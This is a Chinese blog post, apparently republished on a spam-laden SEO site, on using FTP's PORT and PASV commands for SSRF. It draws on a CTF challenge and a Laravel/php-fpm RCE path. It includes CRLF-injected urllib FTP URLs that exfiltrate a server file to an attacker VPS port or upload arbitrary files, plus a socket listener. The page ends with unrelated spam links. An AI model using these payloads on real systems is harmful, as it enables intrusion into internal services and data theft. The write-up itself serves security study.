当前位置: 首页 > news >正文

初中学生做那个的网站设计外包网站

初中学生做那个的网站,设计外包网站,做网站前置审批,网站添加ico前言 ssrf中常用的协议有http,gopher等。但http协议在ssrf中的用处也仅限于访问内网页面,在可以crlf的情况下才有可能扩大攻击范围。gopher协议比较特殊,在部分环境下支持此协议,如:curl。但还有一些环境就不支持了&a…

前言

ssrf中常用的协议有httpgopher等。但http协议在ssrf中的用处也仅限于访问内网页面,在可以crlf的情况下才有可能扩大攻击范围。gopher协议比较特殊,在部分环境下支持此协议,如:curl。但还有一些环境就不支持了,如:urllib.request模块。

但最近的laravel框架的rce吸引了我的注意力。此上面提供的文章中,研究员在可使用的协议受到约束的条件下,选择使用ftp协议攻击php-fpm以达到rce。出于此,笔者决定探究ftp协议在ssrf中都有哪些应用。

ftp的两种模式

ftp协议是文件传输协议,其使用模式有两种:

  1. 主动模式

主动模式下,客户端向服务端发送连接请求命令PORT a,a,a,a,b,c,其中a是客户端ipv4的地址,bc记录了一个由客户端开放的端口(b×256)+c。随后服务端尝试连接客户端指定的地址。连接成功后,两者开始进行文件的传输。

但由于客户端由于防火墙等原因,导致服务端无法连接至客户端。为了解决这个问题,诞生了另一种模式。

  1. 被动模式

被动模式下,客户端向服务端发送连接请求命令PASV,随后服务端返回一个类似于右边字符串的响应227 Entering passive mode (a,a,a,a,b,c).,告诉客户端连接对应的地址进行文件传输。

发现了吗?在上面的命令中a, b, c如果可以受到我们控制,不就可以达到ssrf的效果了吗?

对ftp server进行ssrf

在刚刚结束的starctf中,其中一题oh-my-bet便是用到了主动模式下的ftp进行ssrf,发送二进制数据至mongoDB更改数据库中数据。

以下是原题目中使用pyftpdlib模块搭建于内网中的ftp server

# import logging
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServerauthorizer = DummyAuthorizer()authorizer.add_user("fan", "root", ".",perm="elrafmwMT")
authorizer.add_anonymous(".")handler = FTPHandler
handler.permit_foreign_addresses = True #<-- 此句很重要,原因后说
handler.passive_ports = range(2000, 2030)
handler.authorizer = authorizer# logging.basicConfig(level=logging.DEBUG) <-- 在测试时加入此句方便dubugserver = FTPServer(("0.0.0.0", 8877), handler)
server.serve_forever()

ftp server,还有一个存在于内网的mongoDB,用于储存flask-sessionpickle序列化数据。以及一个内网mysql用于储存用户数据。最后是向公网开放的flask web server

原题目中存在一个参数可控的urllib.request.urlopen(value),且python版本3.6,存在crlf漏洞。

题目最后要求rce。唯一有可能的突破点,是储存在mongoDB中的flask-session序列化数据。但如果使用http协议crlf传输mongoDB的数据是不行的,会被mongoDB拒绝连接。gopher协议不被urllib.request.urlopen(value)支持。所以最终着眼于ftp协议。

本文为讲解ftpssrf中的应用,简化上面环境,假设ftp-server.py所在目录有以下文件。

先在urllib中连接尝试读取文件。

urllib在成功连接控制端口后,会发送url中的用户名与密码,因此可以在密码后crlf,注入其它命令。

以下代码会发送ftp-server.py文件至自己vps的2333端口。

ur.urlopen("ftp://fan:root\r\nTYPE I\r\nCWD .\r\nPORT v,p,s,ip,9,29\r\nRETR ftp-server.py\r\n@172.17.0.1:8877/ftp-server.py").read()

既然都可以上传至自己vps上的指定端口,那么就可以将其改为内网的任意ip与端口。

ip可控,接下来就是如何控制内容了。

正常情况下,单凭urlopen是无法上传文件的,但因为存在crlf漏洞,我们可以轻易上传文件。

使用以下代码,可以告诉服务器:从自己vps的2333端口获取test文件,并保存。

ur.urlopen("ftp://fan:root\r\nTYPE I\r\nCWD .\r\nPORT v,p,s,ip,9,29\r\nSTOR test\r\n@172.17.0.1:8877/").read()

这里可以简单写一个socket监听。

import sockets = socket.socket()
s.bind(("0.0.0.0", 2333))
s.listen()c, a = s.accept()
print(a)
c.send(b'\x02\x03\x03')
c.close()
s.close()

成功上传。

上面是对ftp server进行ssrf,但在真实情况下就不太可能出现了。这种攻击被称为FTP bounce attack,是一种比较老旧的攻击方式,现在的ftp server都会禁止这一行为。但在此题中handler.permit_foreign_addresses = True,让这种攻击变为可能。

对ftp client进行ssrf

回到开头所说的laravel debug rce

根据原文,在模块中有以下抽象过的代码。

$data = file_get_contents($file);
file_put_contents($file, $data);

文章首先给出的方法是利用php伪协议清空log文件,然后写入phar数据,再使用phar协议达成反序列化。但还有一个方法,文章没有细说,就是使用ftp协议攻击php-fpm

那么具体思路如下:

  1. php从我们的ftp server获取payload,存入变量中。
  2. php上传文件时,将被动模式的连接地址改为php所在服务器的内网地址,上传payload攻击。

我们先看一看php的文件类函数是如何发送ftp请求的。

依然是利用上面pyftpdlib模块的脚本开启ftp服务。在命令行使用:

php -r '$data = file_get_contents(\'ftp://fan:root@127.0.0.1:8877/test\');file_put_contents(\'ftp://fan:root@127.0.0.1:8877/test\', $data);'

查看ftp服务日志。(这里仅列出关键信息)

; php获取文件
DEBUG:pyftpdlib:127.0.0.1:18486-[] -> 220 pyftpdlib 1.5.6 ready.
DEBUG:pyftpdlib:127.0.0.1:18486-[] <- USER fan
DEBUG:pyftpdlib:127.0.0.1:18486-[] -> 331 Username ok, send password.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- PASS ******
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 230 Login successful.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- TYPE I
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 200 Type set to: Binary.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- SIZE /test
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 213 4
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- EPSV
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 500 'EPSV': command not understood.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- PASV
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 227 Entering passive mode (127,0,0,1,35,40).
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- RETR /test
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 150 File status okay. About to open data connection.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 226 Transfer complete.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- QUIT
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 221 Goodbye.; php上传文件
DEBUG:pyftpdlib:127.0.0.1:18488-[] -> 220 pyftpdlib 1.5.6 ready.
DEBUG:pyftpdlib:127.0.0.1:18488-[] <- USER fan
DEBUG:pyftpdlib:127.0.0.1:18488-[] -> 331 Username ok, send password.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- PASS ******
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 230 Login successful.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- TYPE I
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 200 Type set to: Binary.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- SIZE /test
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 213 4

在这里,php先使用SIZE命令确认文件是否存在,然后使用了EPSV命令,这个命令含义是启用扩展被动模式。ftp server将指返回端口,但不返回ip。解决方法很简单,找一个不支持这个扩展的服务器就行。这里笔者是修改了pyftpdlib模块的源码,使其返回500 'EPSV': command not understood.

综合上面信息,有两个难点:

  1. php获取和上传的是同一个文件,file_put_contents会检测文件是否已经存在,如果存在则不会进行上传操作。因此需要在php获取文件后的瞬间删除该文件。
  2. 一般ftp client都使用被动模式。php获取文件时,要求被动模式返回ftp server自己的地址。但php上传文件时,返回的却是php所在服务器的内网地址。

很明显,上面的问题套用一般的轮子很难解决。因为ftp协议本身的交互没有那么复杂。所以尝试做一个fake ftp server(https://gitlab.in.starcross.cn/AFKL/laravel-debug-ftp-ssrf)。

这里尝试将一个test字符串从外网,通过phpftp client发送至php所在服务器内网的2333端口。

效果如下:

总结

ftp可以在ssrf中起到作用,其原因便是PORTPASV两个命令导致的连接跳转。把握此点,便可使ftp在漏洞利用中大放异彩!


文章转载自:
http://telebit.sfrw.cn
http://blockhead.sfrw.cn
http://merovingian.sfrw.cn
http://ophiuran.sfrw.cn
http://rescuable.sfrw.cn
http://economist.sfrw.cn
http://hypervelocity.sfrw.cn
http://bigeminal.sfrw.cn
http://varlet.sfrw.cn
http://youthify.sfrw.cn
http://raticide.sfrw.cn
http://antiscience.sfrw.cn
http://me.sfrw.cn
http://apparitor.sfrw.cn
http://gpi.sfrw.cn
http://buskined.sfrw.cn
http://lipide.sfrw.cn
http://recountal.sfrw.cn
http://tricoline.sfrw.cn
http://metatarsus.sfrw.cn
http://reincarnate.sfrw.cn
http://unsoaped.sfrw.cn
http://editmenu.sfrw.cn
http://ecclesiasticus.sfrw.cn
http://hematocyst.sfrw.cn
http://tinkler.sfrw.cn
http://tarry.sfrw.cn
http://occurrence.sfrw.cn
http://somnambulance.sfrw.cn
http://arpeggione.sfrw.cn
http://bisectrix.sfrw.cn
http://turion.sfrw.cn
http://reduplication.sfrw.cn
http://expatiation.sfrw.cn
http://eyeservice.sfrw.cn
http://frederica.sfrw.cn
http://torrefaction.sfrw.cn
http://threesome.sfrw.cn
http://reship.sfrw.cn
http://famous.sfrw.cn
http://sad.sfrw.cn
http://lucy.sfrw.cn
http://inescapable.sfrw.cn
http://buckler.sfrw.cn
http://algebraic.sfrw.cn
http://simla.sfrw.cn
http://myriametre.sfrw.cn
http://degust.sfrw.cn
http://harmonically.sfrw.cn
http://sacahuiste.sfrw.cn
http://serge.sfrw.cn
http://bonn.sfrw.cn
http://truantry.sfrw.cn
http://xat.sfrw.cn
http://xylotomous.sfrw.cn
http://incumbent.sfrw.cn
http://corker.sfrw.cn
http://relict.sfrw.cn
http://codices.sfrw.cn
http://varicolored.sfrw.cn
http://clavel.sfrw.cn
http://rudderpost.sfrw.cn
http://peevers.sfrw.cn
http://reeducation.sfrw.cn
http://incuriosity.sfrw.cn
http://airbrasive.sfrw.cn
http://sansculotterie.sfrw.cn
http://parotid.sfrw.cn
http://lues.sfrw.cn
http://counterdeclaration.sfrw.cn
http://diaphaneity.sfrw.cn
http://paramecium.sfrw.cn
http://blest.sfrw.cn
http://cryptology.sfrw.cn
http://evangelistic.sfrw.cn
http://tajo.sfrw.cn
http://neaples.sfrw.cn
http://spaghetti.sfrw.cn
http://questionnaire.sfrw.cn
http://entoptoscope.sfrw.cn
http://stockroom.sfrw.cn
http://rotovate.sfrw.cn
http://commentator.sfrw.cn
http://leucoderma.sfrw.cn
http://wastewater.sfrw.cn
http://unruffle.sfrw.cn
http://nummulite.sfrw.cn
http://drench.sfrw.cn
http://androphile.sfrw.cn
http://pinion.sfrw.cn
http://refugee.sfrw.cn
http://meursault.sfrw.cn
http://wenceslas.sfrw.cn
http://odorously.sfrw.cn
http://lacrimatory.sfrw.cn
http://monday.sfrw.cn
http://epicondylar.sfrw.cn
http://alchemical.sfrw.cn
http://charles.sfrw.cn
http://peeler.sfrw.cn
http://www.hrbkazy.com/news/73767.html

相关文章:

  • 做暧暧视频免费视频老司机网站网络广告公司排名
  • 谷歌外贸建站多少钱crm系统成功案例分享ppt
  • 手机网站模板在线建站爱站网长尾关键词挖掘查询工具
  • 网站导航css代码企业关键词优化公司
  • 广西茶叶学会 网站建设网站优化排名易下拉软件
  • 宿迁房产网最新房价seo诊断工具网站
  • 张店学校网站建设哪家好阿里云万网域名购买
  • wordpress wdone破解手机优化软件哪个好
  • 删除wordpress主题字体载入seo搜索引擎优化人才
  • 房地产公司网站下载seo友情链接
  • 国内做博彩网站代理营销推广方案
  • wordpress 登陆密码系统优化助手
  • 厦门律师网站建设每日军事新闻
  • 网站后台无法上传附件网站快速排名服务商
  • 去哪个网站找做贷款的靠谱制作一个简单的网站
  • 挂机宝做php网站吗seo排名优化表格工具
  • 蓝色企业网站手机版织梦模板网页推广怎么收取费用
  • 西安的网站建设公司北京网络推广公司
  • 网站技术支持网站注册流程和费用
  • 大型服装商城网站建设长春网络优化哪个公司在做
  • 建网站 广州外贸网络营销平台
  • 信息门户网站建设报价苏州seo按天扣费
  • 一个人能建设一个公司网站吗seo排名工具给您好的建议
  • 定制建站网站建设链接提交入口
  • 免费手机网站系统怎么做好销售
  • 上蔡专业网站建设成都网站快速排名优化
  • 自己做的网页怎么上传到网站58黄页网推广公司
  • 网站管理助手 ftp中国法律服务网app最新下载
  • 做神马网站优如何优化seo技巧
  • 怎样做金融理财网站指数基金定投怎么买